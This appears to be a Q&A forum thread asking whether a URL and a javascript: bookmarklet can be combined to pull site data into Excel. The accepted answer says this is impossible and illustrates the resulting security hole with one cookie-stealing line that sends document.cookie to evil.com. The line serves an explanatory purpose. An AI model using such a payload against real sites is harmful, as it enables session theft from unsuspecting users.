# Combine URL and a javascript bookmarklet together

Tags: url, bookmarklet

I need to access some data in someone's site. The way to get to that page is visiting `http://www.foosite.com` and click a link which has `javascript:foo();` to bring out the real data.

foo() is like:

```
function foo(param){
    createXXXCookie('COOKIE_NAME', param, 60);
    window.location.href="/current/location";
}
```

So this is basically setting the cookie and reload the page again. During page load, the document ready reads COOKIE_NAME and display the corresponding data.

I want to use MS Excel to grab some data from this page. So I was looking for a one go way to get the data. Since in browser address bar, I can enter `http://www.foosite.com` first and then enter `javascript:foo();` to invoke foo(). I was wondering if combining the URL and the bookmarklet, like `http://www.foosite.com;javascript:foo();` could work? I actually tried this, but it seems IE/FF/GC will skip javascript:... part and just proceed the first part of URL.

Answer (score 3, accepted):

This is not possible.

Had it been possible, it would be a deadly security hole.

Email someone a shortlink to `http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie))`, and move on from there to auto-submitting forms.

Comment: that's a good point. So in my case, I just wanted MS Excel to be able to get the data, as the javascript function makes it impossible now. Do you have any idea how to get through it?

Comment: I've used this concept to pull in web data into Excel.
http://bensullins.com/hacking-excel-web-queries/